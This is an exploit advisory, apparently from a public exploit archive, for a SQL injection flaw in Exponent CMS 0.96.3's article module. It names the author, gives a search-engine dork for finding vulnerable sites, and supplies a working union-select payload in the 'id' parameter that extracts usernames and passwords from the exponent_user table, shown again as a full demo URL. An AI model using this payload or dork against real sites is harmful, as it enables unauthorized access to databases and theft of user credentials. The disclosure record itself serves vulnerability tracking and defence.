Exponent CMS version 0.96.3 suffers from a remote SQL injection vulnerability. This really old version has been known vulnerable to various issues since 2005.
236e5d12c5265fddc3ac3ff73e924e5e5e42558448af8504aa17e9bab8af7dbe
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
========================================================
####################################################################
# Author : T u R c O
# Home : www.1923Turk.com
# Script : exponentcms
# Download Script: http://www.exponentcms.org/install/upgrades/exponent-0.97.0-Beta20080611.zip
# Dork: "Welcome to Exponent CMS" | "my new exponent site" inurl:articlemodule
####################################################################
===[ Exploit ]===
www.site.com/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
-1+union+select+1,2,3,password,username,6+from+exponent_user--
Demo:
http://xxxx/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
####################################################################